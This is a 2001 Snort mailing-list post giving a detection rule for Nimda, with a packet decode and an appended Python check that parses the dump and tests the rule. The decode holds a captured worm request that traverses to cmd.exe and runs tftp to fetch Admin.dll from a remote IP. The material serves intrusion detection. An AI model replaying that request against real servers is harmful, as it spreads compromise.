Snort mailing list archives
Signature for NIMDA command
From: Steve Halligan <agent33 () geeksquad com>
Date: Wed, 19 Sep 2001 17:49:14 -0500
This is the signature to detect a Nimda-infected server telling a server that it has determined is vulnerable to use tftp to upload the admin.dll file. If you see this one trip, you have been gotten.

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Successful NIMDA TFTP activity"; flags:A+; uricontent:"cmd.exe?"; uricontent:"c+tftp -i"; nocase; classtype: successful-admin;)

Here is a packet decode of it that I based the rule on.

-steve

------------------------------------------------------------------------------

#(2 - 25210) [2001-09-18 10:17:15] spp_unidecode: Unicode Directory Transversal attack detected
IPv4: 65.29.243.180 -> 65.29.59.70 hlen=5 TOS=0 dlen=191 ID=44180 flags=0 offset=0 TTL=119 chksum=42351
TCP: port=3905 -> dport: 80 flags=***AP*** seq=461005741 ack=288345 off=5 res=0 win=8760 urp=0 chksum=246
Payload: length = 139
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d
050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll c:\Admin.dll
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio
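As an added example (not part of the post or of Snort), this Python check rebuilds the 139-byte payload from the packet decode above and applies the rule's two uricontent tests case-insensitively after URI normalization. The normalization is a simplified stand-in (percent-decoding only) and the benign request is constructed; both are assumptions.

```python
import re
from urllib.parse import unquote

# Hex dump lines copied from the packet decode in the post ("OFF : bytes ascii").
DUMP = r"""
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d
050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll c:\Admin.dll
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50 :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F .Connnectio
"""

# Constructed benign request (assumption) to show the rule does not fire on it.
BENIGN = b"GET /scripts/index.html HTTP/1.0\r\nHost: www\r\n\r\n"

HEX_PAIR = re.compile(r"^[0-9A-Fa-f]{2}$")
# The two uricontent patterns from the rule; 'nocase' means compare lowercased.
RULE_PATTERNS = ("cmd.exe?", "c+tftp -i")

def parse_hexdump(dump):
    """Rebuild payload bytes from dump lines; at most 16 bytes per line,
    and stop at the first token that is not a hex pair (the ASCII column)."""
    out = bytearray()
    for line in dump.strip().splitlines():
        _, _, rest = line.partition(":")
        for tok in rest.split()[:16]:
            if not HEX_PAIR.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)

def request_uri(payload):
    """Return the URI from the request line. This URI contains spaces, so take
    everything between the method and the trailing ' HTTP/x.y' marker."""
    request_line = payload.split(b"\r\n", 1)[0].decode("latin-1")
    _method, _, rest = request_line.partition(" ")
    idx = rest.rfind(" HTTP/")
    return rest[:idx] if idx != -1 else rest

def normalize_uri(uri):
    """Simplified normalization (assumption): %XX decoding only, so the
    '..%5c' in the raw request becomes '..\\' before matching."""
    return unquote(uri)

def rule_matches(payload):
    """True when every uricontent pattern occurs in the normalized, lowercased URI."""
    uri = normalize_uri(request_uri(payload)).lower()
    return all(p in uri for p in RULE_PATTERNS)
```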